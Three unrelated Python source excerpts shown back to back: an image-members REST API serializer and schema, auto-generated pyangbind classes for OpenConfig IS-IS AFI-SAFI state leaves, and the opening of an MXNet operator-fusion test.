raise webob.exc.HTTPBadRequest(explanation=msg)
except ValueError:
msg = _("Member can't be empty")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(member_id=member_id)
def update(self, request):
body = self._get_request_body(request)
try:
status = body['status']
except KeyError:
msg = _("Status not specified")
raise webob.exc.HTTPBadRequest(explanation=msg)
return dict(status=status)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema or get_schema()
def _format_image_member(self, member):
member_view = {}
attributes = ['member_id', 'image_id', 'status']
for key in attributes:
member_view[key] = getattr(member, key)
member_view['created_at'] = timeutils.isotime(member.created_at)
member_view['updated_at'] = timeutils.isotime(member.updated_at)
member_view['schema'] = '/v2/schemas/member'
member_view = self.schema.filter(member_view)
return member_view
def create(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def update(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def index(self, response, image_members):
image_members = image_members['members']
image_members_view = []
for image_member in image_members:
image_member_view = self._format_image_member(image_member)
image_members_view.append(image_member_view)
totalview = dict(members=image_members_view)
totalview['schema'] = '/v2/schemas/members'
body = jsonutils.dumps(totalview, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
def show(self, response, image_member):
image_member_view = self._format_image_member(image_member)
body = jsonutils.dumps(image_member_view, ensure_ascii=False)
response.unicode_body = six.text_type(body)
response.content_type = 'application/json'
_MEMBER_SCHEMA = {
'member_id': {
'type': 'string',
'description': _('An identifier for the image member (tenantId)')
},
'image_id': {
'type': 'string',
'description': _('An identifier for the image'),
'pattern': ('^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}'
'-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$'),
},
'created_at': {
'type': 'string',
'description': _('Date and time of image member creation'),
# TODO(brian-rosmaita): our jsonschema library doesn't seem to like the
# format attribute, figure out why (and also fix in images.py)
# 'format': 'date-time',
},
'updated_at': {
'type': 'string',
'description': _('Date and time of last modification of image member'),
# 'format': 'date-time',
},
'status': {
'type': 'string',
'description': _('The status of this image member'),
'enum': [
'pending',
'accepted',
'rejected'
]
},
'schema': {'type': 'string'}
}
def get_schema():
properties = copy.deepcopy(_MEMBER_SCHEMA)
schema = daisy.schema.Schema('member', properties)
return schema
def get_collection_schema():
member_schema = get_schema()
return daisy.schema.CollectionSchema('members', member_schema)
def create_resource():
"""Image Members resource factory method"""
deserializer = RequestDeserializer()
serializer = ResponseSerializer()
controller = ImageMembersController()
return wsgi.Resource(controller, deserializer, serializer)
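# Illustrative request/response shapes only (hypothetical IDs), matching the
# deserializer and serializer above: a create request carries the new member
# under "member", and every serialized member view has this fixed set of keys.
EXAMPLE_CREATE_REQUEST_BODY = {
    'member': '8989447062e04a818baf9e073fd04fa7',
}
EXAMPLE_MEMBER_VIEW = {
    'member_id': '8989447062e04a818baf9e073fd04fa7',
    'image_id': '71c675ab-d94f-49cd-a114-e12490b328d9',
    'status': 'pending',
    'created_at': '2016-09-01T12:00:00Z',
    'updated_at': '2016-09-01T12:00:00Z',
    'schema': '/v2/schemas/member',
}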
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/afi-safi/af/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines AFI-SAFI State information
"""
__slots__ = (
"_path_helper", "_extmethods", "__afi_name", "__safi_name", "__enabled"
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"afi-safi",
"af",
"state",
]
def _get_afi_name(self):
"""
Getter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
YANG Description: Address-family type.
"""
return self.__afi_name
def _set_afi_name(self, v, load=False):
"""
Setter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_afi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_afi_name() directly.
YANG Description: Address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """afi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="afi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__afi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_afi_name(self):
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_safi_name(self):
"""
Getter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
YANG Description: Subsequent address-family type.
"""
return self.__safi_name
def _set_safi_name(self, v, load=False):
"""
Setter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_safi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_safi_name() directly.
YANG Description: Subsequent address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """safi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="safi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__safi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_safi_name(self):
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
afi_name = __builtin__.property(_get_afi_name)
safi_name = __builtin__.property(_get_safi_name)
enabled = __builtin__.property(_get_enabled)
_pyangbind_elements = OrderedDict(
[("afi_name", afi_name), ("safi_name", safi_name), ("enabled", enabled)]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/afi-safi/af/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines AFI-SAFI State information
"""
__slots__ = (
"_path_helper", "_extmethods", "__afi_name", "__safi_name", "__enabled"
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"afi-safi",
"af",
"state",
]
def _get_afi_name(self):
"""
Getter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
YANG Description: Address-family type.
"""
return self.__afi_name
def _set_afi_name(self, v, load=False):
"""
Setter method for afi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/afi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_afi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_afi_name() directly.
YANG Description: Address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """afi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV4': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:IPV6': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="afi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__afi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_afi_name(self):
self.__afi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV4": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:IPV6": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="afi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_safi_name(self):
"""
Getter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
YANG Description: Subsequent address-family type.
"""
return self.__safi_name
def _set_safi_name(self, v, load=False):
"""
Setter method for safi_name, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/safi_name (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_safi_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_safi_name() directly.
YANG Description: Subsequent address-family type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """safi_name must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:UNICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}, 'oc-isis-types:MULTICAST': {'@module': 'openconfig-isis-types', '@namespace': 'http://openconfig.net/yang/isis-types'}},), is_leaf=True, yang_name="safi-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__safi_name = t
if hasattr(self, "_set"):
self._set()
def _unset_safi_name(self):
self.__safi_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:UNICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
"oc-isis-types:MULTICAST": {
"@module": "openconfig-isis-types",
"@namespace": "http://openconfig.net/yang/isis-types",
},
},
),
is_leaf=True,
yang_name="safi-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/afi_safi/af/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
afi_name = __builtin__.property(_get_afi_name)
safi_name = __builtin__.property(_get_safi_name)
enabled = __builtin__.property(_get_enabled)
_pyangbind_elements = OrderedDict(
[("afi_name", afi_name), ("safi_name", safi_name), ("enabled", enabled)]
)
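# A minimal sketch (assumption: pyangbind and its runtime deps are installed):
# these leaves are config false, so they are exposed as read-only properties
# and backends populate them through the private _set_* methods.
if __name__ == "__main__":
    s = state()
    print(list(s._pyangbind_elements))            # ['afi_name', 'safi_name', 'enabled']
    try:
        s.enabled = True                          # no property setter -> AttributeError
    except AttributeError:
        s._set_enabled(True)                      # the way a backend populates the leaf
    print(bool(s.enabled))                        # True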
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import random
import itertools
import mxnet as mx
import numpy as np
from mxnet import autograd, gluon
from mxnet.test_utils import *
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import with_seed
def check_fused_symbol(sym, **kwargs):
inputs = sym.list_inputs()
shapes = {inp : kwargs[inp].shape for inp in inputs}
ctx = kwargs.get('ctx', mx.gpu(0))
# Double identity so that there is always something to fuse
test_sym = mx.sym.Group([mx.sym.identity(mx.sym.identity(s)) for s in sym])
rtol = {'float16' : 1e-2,
'float32' : 1.5e-6,
'float64' : 1.5e-6,
}
atol = {'float16' : 1e-3,
'float32' : 1e-7,
'float64' : 1e-7,
}
for dtype in ['float16', 'float32', 'float64']:
data = {inp : kwargs[inp].astype(dtype) for inp in inputs}
for grad_req in ['write', 'add']:
type_dict = {inp : dtype for inp in inputs}
with environment('MXNET_USE_FUSION', '0'):
orig_exec = test_sym._simple_bind(ctx=ctx, grad_req=grad_req, type_dict=type_dict, **shapes)
with environment('MXNET_USE_FUSION', '1'):
fused_exec = test_sym._simple_bind(ctx=ctx, grad_req=grad_req, type_dict=type_dict, **shapes)
fwd_orig = orig_exec.forward(is_train=True, **data)
out_grads = [mx.nd.ones_like(arr) for arr in fwd_orig]
orig_exec.backward(out_grads=out_grads)
fwd_fused = fused_exec.forward(is_train=True, **data)
fused_exec.backward(out_grads=out_grads)
for orig, fused in zip(fwd_orig, fwd_fused):
np.testing.assert_allclose(orig.asnumpy(), fused.asnumpy(), rtol=rtol[dtype], atol=atol[dtype])
for orig, fused in zip(orig_exec.grad_arrays, fused_exec.grad_arrays):
if orig is None and fused is None:
continue
assert orig is not None
assert fused is not None
